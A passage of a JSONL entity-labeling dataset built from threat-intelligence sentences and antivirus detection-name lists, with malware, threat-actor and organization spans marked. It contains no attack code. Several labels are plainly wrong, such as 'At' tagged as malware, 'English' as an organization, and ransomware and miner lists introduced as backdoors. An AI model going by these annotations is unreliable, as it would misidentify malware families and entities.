BKDR_VENIK_EL150010.UVPM Constructor.Win32.Houndhack.a Riskware.Win32.Houndhack.erbccv Trojan.DownLoader17.62076 BKDR_VENIK_EL150010.UVPM BehavesLike.Win32.Backdoor.dc HackTool[Constructor]/Win32.Houndhack Trojan.Zusy.D35C86 Constructor.Win32.Houndhack.a 
Backdoor:Win32/Venik.J Backdoor/Win32.Venik.R169912 Constructor.Houndhack Constructor.Houndhack! Trojan.Constructor", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004423", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.BitCoinMiner.ZM Trojan.BitMiner Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.BitCoinMiner.agl Riskware.Win64.BitMiner.ewyekq BehavesLike.Win32.AdwareLinkury.vc PUA/CoinMiner.B Trojan/Win32.BitCoinMiner Trojan.Win32.BitCoinMiner.agl Trojan.Win32.BitcoinMiner", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004424", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Small!O Trojan.Maptsc Trojan.Small.Win32.19366 Trojan.Heur.RP.EAC7EB TROJ_SMALL.NHQ Trojan.Win32.Small.cpb Trojan.Win32.Small.ebpbhy Troj.W32.Small.cpb!c Trojan.Click2.55177 TROJ_SMALL.NHQ Trojan.Win32.Small W32/Trojan.ZWIN-6050 Trojan/Small.ovd TR/Spy.6656.172 Trojan/Win32.Small Trojan:Win32/Maptsc.A Trojan.Win32.Small.cpb Trojan/Win32.Connapts.C256364 Trojan.Small.cpb Trojan.Small Win32.Trojan.Small.Edod Trojan.Click!cGVrs+boA6s Win32/Trojan.4c4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004425", "source": "cyner2_train"}} {"text": "More information from PWC about Sofacy Bedep malware using DGA CozyDuke aka CozyBear, CozyCar or Office Monkeys is a threat actor that became increasingly active in the 2nd half of 2014 and hit a variety of targets.", "spans": {"ORGANIZATION: PWC": [[22, 25]], "MALWARE: Sofacy Bedep malware": [[32, 52]], "THREAT_ACTOR: CozyDuke aka CozyBear, CozyCar": [[63, 93]], "THREAT_ACTOR: Office Monkeys": [[97, 111]], "THREAT_ACTOR: threat actor": [[117, 129]]}, "info": {"id": "cyner2_train_004430", "source": "cyner2_train"}} {"text": "In the email screenshot with our added machine translation from Russian, notice the subject line and message body text reflecting a business customer upset about extra charges on his credit card 
social engineering theme.", "spans": {"SYSTEM: added machine translation": [[33, 58]], "ORGANIZATION: a business customer": [[130, 149]]}, "info": {"id": "cyner2_train_004434", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.GarusenV.Trojan Worm/W32.Vobfus.225280 Worm.Win32.Vobfus!O W32/Vobfus.io Trojan.Barys.950 WORM_VOBFUS.SM02 Win32.Trojan.VBObfus.f WORM_VOBFUS.SM02 Win.Trojan.Vobfus-28 Worm.Win32.Vobfus.biec Trojan.Win32.WBNA.cihuhh Worm.Win32.A.Vobfus.225280 TrojWare.Win32.Pronny.EE Trojan.VbCrypt.60 BehavesLike.Win32.VBObfus.dm Worm.Win32.Vobfus Worm/WBNA.dfdh WORM/Vobfus.dbmnua Worm.Win32.Vobfus.biec Trojan/Win32.Vobfus.R36953 BScope.Trojan.Diple Win32/Pronny.EJ W32/Vobfus.GEW.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004435", "source": "cyner2_train"}} {"text": "These have been the attacks on Saudi Arabian companies where a destructive malware known as Disttrack was deployed.", "spans": {"ORGANIZATION: Saudi Arabian companies": [[31, 54]], "MALWARE: destructive malware": [[63, 82]], "MALWARE: Disttrack": [[92, 101]]}, "info": {"id": "cyner2_train_004438", "source": "cyner2_train"}} {"text": "In addition, we found that the infrastructure used in this case overlaps with FindPOS/PoSeidon as well as Chanitor and sits amidst a cluster of largely indiscriminate malicious activity.", "spans": {"MALWARE: FindPOS/PoSeidon": [[78, 94]], "MALWARE: Chanitor": [[106, 114]]}, "info": {"id": "cyner2_train_004439", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Chifrax.150357 Trojan.Chifrax.rw5 Trojan/Chifrax.a BKDR_POISON.VA W32/Poison.AX Backdoor.Odivy Win32/Poison.AAE BKDR_POISON.VA Win.Trojan.Poison-11 Trojan.Win32.Chifrax.a Trojan.Win32.Chifrax.fwpet Trojan.DownLoader9.38925 Trojan.Chifrax.Win32.1349 BehavesLike.Win32.Dropper.cc W32/Poison.HQGF-3018 Trojan/Chifrax.epp TR/Drop.PoisonIvy.C.1 W32/Chifrax.A!tr Trojan/Win32.Chifrax Troj.W32.Chifrax.a!c TrojanDropper:Win32/Poisonivy.C 
Win-Trojan/Poisonivy.150357 Trojan.Chifrax Win32/Poison.NGS Win32.Trojan.Chifrax.Wskn Trojan.Chifrax!Xo07JnrMN1M Trojan.Win32.Chifrax Trj/Chifrax.C Win32/Trojan.954", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004440", "source": "cyner2_train"}} {"text": "A backdoor also known as: AIT:Trojan.Autoit.CLU Win32.Trojan-Dropper.Autoit.l W32/Trojan.TWFF-1697 AIT:Trojan.Autoit.CLU Trojan.Win32.Beast.exaenx AIT:Trojan.Autoit.CLU BackDoor.Beast BehavesLike.Win32.PUPXAI.dh AIT:Trojan.Autoit.CLU Trojan.Autoit.F AIT:Trojan.Autoit.CLU AIT:Trojan.Autoit.CLU Trj/CI.A Win32/Trojan.0fc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004441", "source": "cyner2_train"}} {"text": "Chikdos is a malware that targeted MySQL servers to make them conduct distributed denial-of-service DDoS attacks against other websites.", "spans": {"MALWARE: Chikdos": [[0, 7]], "MALWARE: malware": [[13, 20]], "SYSTEM: MySQL servers": [[35, 48]]}, "info": {"id": "cyner2_train_004442", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Tartober BKDR_TARTOBER.A Win32.Trojan.WisdomEyes.16070401.9500.9999 BScope.Trojan-Spy.Zbot BKDR_TARTOBER.A Trojan.Win32.Wisp.zraky BackDoor.Wisp.11 BehavesLike.Win32.Trojan.dc W32/Trojan.TTYH-5266 Trojan.Zusy.Elzob.D39B5 Backdoor:Win32/Tartober.A Trj/CI.A Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004445", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom/W32.WannaCry.5267459.F Ransom.Zenshirsh.SL8 Ransom.WannaCrypt Trojan/Exploit.CVE-2017-0147.a Win32.Worm.Rbot.a Ransom.Wannacry Ransom_WCRY.SMJ Win.Ransomware.WannaCry-6313787-0 Win32.Exploit.CVE-2017-0147.A Trojan-Ransom.Win32.Wanna.m Trojan.Win32.Wanna.epxkni Trojan.Win32.WannaCry.5267459 Troj.Ransom.W32.Wanna.toP0 Trojan.Encoder.11432 Trojan.Wanna.Win32.98 Ransom_WCRY.SMJ BehavesLike.Win32.RansomWannaCry.tt Trojan.Wanna.k TR/WannaCrypt.ahdyg Trojan[Ransom]/Win32.Wanna 
Trojan:Win32/Eqtonex.F!dha Trojan-Ransom.Win32.Wanna.m Trojan/Win32.WannaCryptor.R200894 Hoax.Wanna Trj/GdSda.A Win32/Exploit.CVE-2017-0147.A Exploit.CVE-2017-0147! Trojan.Win32.Exploit W32/Wanna.M!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004447", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.TrojanPigax Trojan-Downloader.Win32.Small.akrf Trojan-Downloader.Win32.Small.akrf TR/Dldr.Small.akrf Trojan.Dldr.Small.akrf Trojan-Downloader.Win32.Small.akrf Trojan-Downloader.Win32.Small W32/Small.AKRF!tr.dldr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004448", "source": "cyner2_train"}} {"text": "REDBALDKNIGHT, also known as BRONZE BUTLER and Tick, is a cyberespionage group known to target Japanese organizations such as government agencies including defense as well as those in biotechnology, electronics manufacturing, and industrial chemistry.", "spans": {"THREAT_ACTOR: REDBALDKNIGHT,": [[0, 14]], "THREAT_ACTOR: BRONZE BUTLER": [[29, 42]], "THREAT_ACTOR: Tick,": [[47, 52]], "THREAT_ACTOR: cyberespionage group": [[58, 78]], "ORGANIZATION: Japanese organizations": [[95, 117]], "ORGANIZATION: government agencies": [[126, 145]], "ORGANIZATION: biotechnology, electronics manufacturing,": [[184, 225]], "ORGANIZATION: industrial chemistry.": [[230, 251]]}, "info": {"id": "cyner2_train_004450", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.NaviPromo.3 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Lipler.B!packed TROJ_SKINTRI.SMC Trojan.Win32.Hrup.aah Troj.Downloader.W32.Lipler.lcwl TROJ_SKINTRI.SMC Trojan/Win32.Hrup Trojan:Win32/Skintrim.C Trojan.Win32.Hrup.aah Win32.Trojan.Hrup.Ajvd Trojan.Win32.Skintrim W32/Skintrim.CG!tr Win32/Trojan.IM.c6f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004451", "source": "cyner2_train"}} {"text": "Ursnif campaigns against EU and mainly Italy spreaded by a JScript", "spans": {"THREAT_ACTOR: 
Ursnif campaigns": [[0, 16]], "SYSTEM: JScript": [[59, 66]]}, "info": {"id": "cyner2_train_004452", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Autorun.Worm.aaeh Win32.Trojan.WisdomEyes.16070401.9500.9867 TSPY_TEPFER.GB Trojan.Win32.VBTrojan.bvufrt TrojWare.Win32.VB.HR Trojan.DownLoader10.21377 TSPY_TEPFER.GB BehavesLike.Win32.Swisyn.cc Trojan:Win32/Beelog.C Trojan.Win32.Jorik.28672.A Trojan/Win32.Jorik.R44838 Trj/CI.A Win32/Trojan.Downloader.f2c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004453", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Yaha.S W32/Yaha.aa@MM Trojan.Heur.ED1374C Win32.Trojan.WisdomEyes.16070401.9500.9777 W32.Yaha.AE@mm Win32/Yaha.Y Win.Worm.Yaha-8 Email-Worm.Win32.Lentin.s Trojan.Win32.Lentin.emzf I-Worm.Win32.Yaha.60304 Win32.Worm-email.Lentin.Wvki TrojWare.Win32.Patched.KSU Win32.HLLM.Yaha.7 W32/Yaha.aa@MM WORM/Lentin.S Worm[Email]/Win32.Lentin Worm:Win32/Yaha.AA@mm Backdoor.W32.Bifrose.l4Wh Email-Worm.Win32.Lentin.s Trojan.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004456", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Win32.Veebee.1!O Trojan.VB.rw3 Trojan.Happili Trojan.Inject!SEi/RTfcvEo W32/Backdoor2.HUHI TROJ_SPNR.0BD714 Trojan.Win32.Inject.kxez Trojan.Win32.Inject.cwbjpa Trojan.Boaxxe.2 Trojan.Inject.Win32.72022 TR/Dropper.VB.6820 TROJ_SPNR.0BD714 Trojan/Win32.Inject Win32.Troj.Inject.kx.kcloud W32/Backdoor.PZSO-6760 TScope.Trojan.VB Trj/WLT.A Win32/Boaxxe.BL Win32.Trojan.Inject.Sxek Virus.Win32.VBInject W32/Zbot.RZIM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004457", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.Hukle.157044 Trojan.Hukle.Win32.18 Trojan/PSW.Hukle.o Trojan.PWS.Hukle!uPlO8aKf2dU W32/Trojan2.GWXZ Infostealer.Hukle TROJ_HUKLE.O Win.Trojan.Hukle-16 Trojan-PSW.Win32.Hukle.o Trojan.Win32.Hukle.dhvf Troj.PSW32.W.Hukle.o!c 
TrojWare.Win32.PSW.Hukle.~R Trojan.PWS.Hukle.145 TROJ_HUKLE.O BehavesLike.Win32.PWSZbot.ch W32/Trojan.TBYH-4941 Trojan/Hiddukel.t W32/Hukle.O!tr.pws Trojan[PSW]/Win32.Hukle Trojan.Zusy.Elzob.D3190 Win-Trojan/Hukle.151040 PWS:Win32/Hukle.O Trojan-PWS.Win32.Hukle Trojan.Win32.InfoStealer.o", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004458", "source": "cyner2_train"}} {"text": "The vulnerability comes from the interaction of the mechanism that enforces JavaScript context separation the same origin policy and Firefox's PDF Viewer.", "spans": {"VULNERABILITY: vulnerability": [[4, 17]], "VULNERABILITY: JavaScript": [[76, 86]], "SYSTEM: Firefox's PDF Viewer.": [[133, 154]]}, "info": {"id": "cyner2_train_004459", "source": "cyner2_train"}} {"text": "The email message and the lure document are written in Hebrew, Arabic or English – depending on the target audience.", "spans": {"ORGANIZATION: English": [[73, 80]]}, "info": {"id": "cyner2_train_004462", "source": "cyner2_train"}} {"text": "The adversary's campaign has active and operational Command and Control C2 servers.", "spans": {"THREAT_ACTOR: The adversary's campaign": [[0, 24]]}, "info": {"id": "cyner2_train_004463", "source": "cyner2_train"}} {"text": "A one-man cybercriminal operation that uses point-of-salePoS malware has stolen more than 22,000 unique credit card numbers from terminals in Brazil,Canada, and the United States in a span of just one month.", "spans": {"THREAT_ACTOR: cybercriminal operation": [[10, 33]], "MALWARE: point-of-salePoS malware": [[44, 68]]}, "info": {"id": "cyner2_train_004466", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/OnlineGames.LWBP Worm.Autorun-4618 Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R Trojan.PWS.Wsgame.22668 Win32/Oflwr.A!crypt Heur:Trojan/PSW.OnlineGames BScope.HackTool.Sniffer.WpePro Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004467", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: W32.FakelsasLTD1.Trojan Trojan.Win32.Small!O Trojan.Upatre.S1164383 Trojan/Downloader.Small.aab Win32.Trojan.Inject.bm W32/Trojan.TBSZ-0334 Win32/Upatre.Q TROJ_BANLOAD.KAV Win.Trojan.Rubinurd-67 Trojan.Win32.Small.cpl Trojan.Win32.Small.ciwsuw TrojWare.Win32.Injector.AH Trojan.DownLoad3.28161 Trojan.Bublik.Win32.12106 TROJ_BANLOAD.KAV BehavesLike.Win32.PWSZbot.dh Backdoor.Win32.Androm W32/Trojan3.GBH Trojan/Small.oxi Trojan/Win32.Bublik Trojan.Win32.Small.cpl Trojan:Win32/Dorv.D!rfn Worm/Win32.Palevo.C199836 Trojan.Small Trojan.Email.FA Trojan.Small.AAB Win32/TrojanDownloader.Small.AAB Trojan.Bublik!BrbaRvXyIc8 W32/Bublik.AAB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004468", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Backdoor.80", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004470", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Exxroute.A3 Trojan.Ransom.Lukitos.1 Ransom_CERBER.SM37 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Ramnit!dr Ransom_CERBER.SM37 Trojan.PWS.Sphinx.2 BehavesLike.Win32.Ransomware.cc Trojan:Win32/CeeInject.MJ!bit Trojan/Win32.Fareit.R189070 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004471", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.WisdwslD.Trojan TrojanDownloader.Esaprof.A4 Trojan.Strictor.D542D Trojan.Esaprof Win32/SillyDL.YTP TROJ_ESAPROF_EK2501B4.UVPM SWF.Plicker.1 TROJ_ESAPROF_EK2501B4.UVPM BehavesLike.Win32.Dropper.wc TrojanDownloader:SWF/Esaprof.B Trojan.Win32.Downloader.3514368[UPX] Trojan.Downloader Trj/CI.A SWF/TrojanDownloader.Esaprof.A Trojan.Patched", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004473", "source": "cyner2_train"}} {"text": "A spear-phishing email was sent to a diplomat of the Embassy of Uzbekistan who is likely based in Beijing, China.", "spans": {"ORGANIZATION: diplomat of the 
Embassy of Uzbekistan": [[37, 74]]}, "info": {"id": "cyner2_train_004475", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SocksT.Trojan Worm.Win32.Socks!O Trojan.Zbot.EO4 Worm.Socks.Win32.38 W32.W.Socks.tnAV W32/Socks.ey TROJ_SPNR.14DL13 Win32.Trojan.Kryptik.el Win32/Tnega.McRJca TROJ_SPNR.14DL13 Win.Trojan.Ag-4254306-1 Worm.Win32.Socks.ey Trojan.Win32.Socks.wtnjo Worm.Win32.Socks.791340 BackDoor.FireOn.221 BehavesLike.Win32.VirRansom.tc Trojan-Spy.Zbot.BE Trojan/PSW.Almat.dwk W32.Infostealer.Zeus Worm/Win32.Socks Worm.Socks.ey.kcloud Worm.Socks Worm.Win32.Socks.ey Worm/Win32.Socks.C35688 Virus.Socks.ey Worm.Socks!MDTxLrvAMvg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004477", "source": "cyner2_train"}} {"text": "Turla, which has been targeting governments, government officials and diplomats for years – see, as an example, this recent paper – is still using watering hole techniques to redirect potentially interesting victims to their C C infrastructure.", "spans": {"THREAT_ACTOR: Turla,": [[0, 6]], "ORGANIZATION: governments, government officials": [[32, 65]], "ORGANIZATION: diplomats": [[70, 79]], "SYSTEM: C C infrastructure.": [[225, 244]]}, "info": {"id": "cyner2_train_004478", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DostoxaLTB.Trojan Trojan.Mogoogwi.A3 WORM_MOGOOGWI.SMHA Win32.Trojan.WisdomEyes.16070401.9500.9996 WORM_MOGOOGWI.SMHA Trojan-Dropper.MSIL Trojan:MSIL/Mogoogwi.A Trojan.Barys.DC996 Trojan/Win32.Zusy.R154407 Trj/CI.A Win32/Trojan.65a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004479", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.A8 Trojan.Ransom.Globe Win32.Trojan.WisdomEyes.16070401.9500.9595 Ransom.Purge Ransom_PURGE.SM1 Win32.Trojan-Ransom.Globe.A Trojan-Ransom.Win32.Purga.v Win32.Trojan.Purga.Hvjx Trojan.Encoder.6182 BehavesLike.Win32.Sytro.kc W32/Trojan.DXHE-6024 Trojan.CryFile.co 
Trojan[Ransom]/Win32.CryFile Troj.Ransom.W32!c Trojan-Ransom.Win32.Purga.v Ransom:Win32/Contentocrypt.A Trojan/Win32.CryFile.R186838 TrojanDropper.Dapato Ransom.Globe Trojan.Filecoder!iQ4fX8DOQ4o Trj/GdSda.A Win32/Trojan.Ransom.524", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004482", "source": "cyner2_train"}} {"text": "Taiwan has long been subjected to persistent targeting from espionage motivated threat actors.", "spans": {"THREAT_ACTOR: espionage motivated threat actors.": [[60, 94]]}, "info": {"id": "cyner2_train_004483", "source": "cyner2_train"}} {"text": "This attack chain exposed millions of potential victims in the US, Canada, the UK, and Australia, leveraging slight variations on a fake browser update scheme that worked on all three major Windows web browsers.", "spans": {"SYSTEM: Windows web browsers.": [[190, 211]]}, "info": {"id": "cyner2_train_004484", "source": "cyner2_train"}} {"text": "Our investigation into these attacks has unearthed more details into the method by which the threat actors delivered the Disttrack payload.", "spans": {"THREAT_ACTOR: the threat actors": [[89, 106]], "MALWARE: Disttrack payload.": [[121, 139]]}, "info": {"id": "cyner2_train_004485", "source": "cyner2_train"}} {"text": "We re constantly following, detecting and monitoring the lifecycle of these RATs as they appear, disappear and often reappear under a new moniker.", "spans": {}, "info": {"id": "cyner2_train_004486", "source": "cyner2_train"}} {"text": "Shipping companies and medical laboratories in Asia are being targeted in a likely intelligence-gathering campaign that relies exclusively on publicly available and living-off-the-land tools.", "spans": {"ORGANIZATION: Shipping companies": [[0, 18]], "ORGANIZATION: medical laboratories": [[23, 43]], "THREAT_ACTOR: intelligence-gathering campaign": [[83, 114]]}, "info": {"id": "cyner2_train_004487", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.Small.8704.J 
Trojan-Spy.Win32.Small!O TrojanDownloader.Dielel Troj.Spy.W32.Small.jzk!c TROJ_GOGLOAD.A Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan.IOOK-0066 TROJ_GOGLOAD.A Trojan-Spy.Win32.Small.jzk DLOADER.Trojan Trojan.Win32.Spy DangerousObject.Multi.bcf W32/Small.JZK!tr Trojan[Spy]/Win32.Small Win32.Troj.small.j.kcloud Trojan.Heur.LP.EEE6A9 Trojan-Spy.Win32.Small.jzk TrojanDownloader:Win32/Dielel.A TrojanSpy.Small Win32.Trojan-spy.Small.Iit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004488", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: Trojan.Linux.MiraiDDoS.BI Downloader.Mirai.Linux.8 Troj.Downloader.Linux!c ELF_MIRAI.A HEUR:Trojan-Downloader.Linux.Mirai.b Trojan.Linux.MiraiDDoS.BI Trojan.Mlw.ektbyu Trojan.Linux.MiraiDDoS.BI Trojan.Linux.MiraiDDoS.BI Linux.DownLoader.289 ELF_MIRAI.A LINUX/Dldr.Mirai.qqlgv Trojan[Downloader]/Linux.Gafgyt.b Trojan.Linux.MiraiDDoS.BI Linux.S.Mirai.1204 HEUR:Trojan-Downloader.Linux.Mirai.b TrojanDownloader:Linux/Mirai.A Backdoor.Linux.Mirai Linux.Trojan-downloader.Gafgyt.Amlt Trojan-Downloader.Linux.Mirai Trojan.Linux.MiraiDDoS.BI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004491", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Verauto.A Win32.Worm.Verauto.A Trojan/VB.oda Win32.Worm.Verauto.A W32/VB.OO Virus.Win32.VB.b Win32.Worm.Verauto.A Virus.Win32.VB.gixe W32.VB.b!c Win32.Virus.Vb.Swum Win32.Worm.Verauto.A Virus.Win32.VB.b Win32.Worm.Verauto.A Win32.HLLW.Verauto Virus.VB.Win32.76 worm.win32.vobfus.cf W32/VB.YYAQ-1388 WORM/Verauto.A Virus/Win32.VB Worm:Win32/SillyVB.B Win32.Worm.Verauto.A Trojan.VB Win32/VB.ODA .Virus.EICAR_BOOV Worm.Win32.VB W32/VB.B!tr Win32/VB.BM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004499", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanSpy.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9866 Trojan.Win32.Downeks.exeslg 
Troj.Spy.Msil.Downeks!c Trojan.MSILPerseus.D21B6F TrojanSpy:MSIL/Tinclex.A Riskware.Confuser! Trj/GdSda.A Win32/Trojan.Spy.7a8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004501", "source": "cyner2_train"}} {"text": "The malware, which has been identified by many vendors on VirusTotal, has been labeled by our researchers as Trojan.Chinad or just Chinad as an alternative short label.", "spans": {"MALWARE: malware,": [[4, 12]], "ORGANIZATION: VirusTotal,": [[58, 69]], "MALWARE: Chinad": [[131, 137]]}, "info": {"id": "cyner2_train_004503", "source": "cyner2_train"}} {"text": "The group behind the attacks is possibly associated with the Russian government and has been active since at least 2007.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: Russian government": [[61, 79]]}, "info": {"id": "cyner2_train_004504", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.BCDE Backdoor.Baceed Backdoor.Hupigon.Win32.11548 Backdoor.W32.Hupigon.torp W32/Backdoor2.EVBN Backdoor.Trojan Win.Trojan.Hupigon-27433 Backdoor.Win32.Hupigon.gklq Trojan.Win32.Hupigon.wnxa Backdoor.Win32.Hupigon.163840.I Backdoor.Win32.Hupigon.gklqo BackDoor.Pigeon1.8593 W32/Backdoor.ECNM-9194 Backdoor/Hupigon.jmk W32.Backdoor.Hupigon BDS/Baceed.hrhsh Trojan[Backdoor]/Win32.Hupigon Backdoor:Win32/Baceed.A!bit Backdoor.Win32.Hupigon.gklq Trojan/Win32.Hupigon.R42586 TScope.Malware-Cryptor.SB Win32.Backdoor.Hupigon.Pavs Backdoor.Win32.Hupigon Win32/Trojan.aab", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004505", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.Crypt12 Ransom.Kristina Ransom_CRYPTWELVE.B Win32.Trojan.WisdomEyes.16070401.9500.9562 Ransom.CryptXXX Ransom_CRYPTWELVE.B Win.Ransomware.Kristina-6367716-1 MSIL.Trojan-Ransom.Crypt12.B Trojan.Win32.Encoder.evktgv Trojan.Win32.Z.Ransom.124928.G Trojan.Encoder.15080 Trojan.Filecoder.Win32.6738 Ransom.MSIL.Natiris W32/Trojan.ERVC-5011 
TR/RedCap.khogd Ransom:MSIL/Natiris.A Trojan/Win32.Ransom.C2247299 Trj/GdSda.A Win32/Trojan.Ransom.15c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004506", "source": "cyner2_train"}} {"text": "First we got the Linux variant, and with information extracted from its binary, we were able to find the variant for Windows desktops, too.", "spans": {"SYSTEM: Linux variant,": [[17, 31]], "MALWARE: binary,": [[72, 79]], "SYSTEM: Windows desktops,": [[117, 134]]}, "info": {"id": "cyner2_train_004508", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Esacel Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Kryptik.exqpjd Trojan.Kryptik.Win32.1351348 W32/Trojan.MCPS-3536 TR/Crypt.ZPACK.ocodu Trojan.Esacel Trj/CI.A Trojan.Kryptik!MH3d/6dQFBI Trojan.Inject Malicious_Behavior.SB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004512", "source": "cyner2_train"}} {"text": "At FireEye Labs, we recently detected the resurgence of a coin mining campaign with a novel and unconventional infection vector in the form of an iFRAME inline frame – an HTML document embedded inside another HTML document on a web page that allows users to get content from another separate source and display it within the main web page – embedded in a PE binary Portable Executable Binary, or .exe.", "spans": {"MALWARE: At": [[0, 2]], "ORGANIZATION: FireEye Labs,": [[3, 16]], "THREAT_ACTOR: coin mining campaign": [[58, 78]], "VULNERABILITY: infection vector": [[111, 127]], "ORGANIZATION: web": [[228, 231]]}, "info": {"id": "cyner2_train_004514", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.QHost.ACI Trojan.Win32.Qhost!O Trojan.QHost.ACI TROJ_RENOS.TU Win32.Trojan.WisdomEyes.16070401.9500.9838 W32/Trojan.YCCB-6079 Trojan.Dropper TROJ_RENOS.TU Win.Trojan.Small-4579 Trojan.Win32.Qhost.abh Trojan.QHost.ACI Trojan.Win32.Qhost.slro Trojan.QHost.ACI TrojWare.Win32.TrojanDownloader.FakeAlert.G Trojan.QHost.ACI 
Trojan.Fakealert.399 BehavesLike.Win32.Dropper.nc W32/Trojan2.CMAE Trojan/Qhost.tf Trojan:Win32/Wantvi.C Trojan.Win32.Qhost.abh Trojan.QHost.ACI Trojan/Win32.Qhost.R34501 Trojan.QHost.ACI OScope.Hoax.Win32.FakeAlert Trojan.Qhost Win32/TrojanDownloader.FakeAlert.G Trojan.Qhost.EP Trojan.Win32.Qhost.abh W32/Qhost.ABH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004515", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Mediket.CD Troj.Downloader.W32.Mediket.cd!c Trojan/Downloader.Mediket.cd Win32.Trojan.WisdomEyes.16070401.9500.9810 W32/Downloader.JJGI-8097 Win32/SillyDl.FL Trojan-Downloader.Win32.Mediket.cd Trojan.Win32.Mediket.dkal Trojan.Win32.Downloader.10240.ES Trojan.DownLoader.7470 Downloader.Mediket.Win32.64 Trojan-Downloader.Win32.Mediket.bl W32/DldrX.DHK TrojanDownloader.Mediket.fv TR/Dldr.Mediket.S.2 Trojan[Downloader]/Win32.Mediket Trojan.Heur.amGfYI3rB7li Trojan-Downloader.Win32.Mediket.cd Trojan/Win32.Small.C140121 Trojan-Downloader.Win32.Mediket.ca Trojan-Downloader.Mediket.CD Win32.Trojan-downloader.Mediket.Ajvz W32/Dloader.CD!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004516", "source": "cyner2_train"}} {"text": "A particular focus appears to have been placed on the healthcare industry.", "spans": {}, "info": {"id": "cyner2_train_004517", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.6656.AAX Trojan.Win32.Small!O Trojan.Tosct Trojan.Heur.RP.EF49A0 TROJ_DLOADER.FAV Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.MPRY-6149 TROJ_DLOADER.FAV Trojan.Win32.Small.coy Trojan.Win32.Small.cwxndz Trojan.Click2.56220 Trojan.Small.Win32.19363 Trojan.Win32.Tosct Trojan/Small.ovb TR/Spy.6656.106 Trojan/Win32.Small Win32.Troj.Undef.kcloud Trojan.Win32.Small.coy 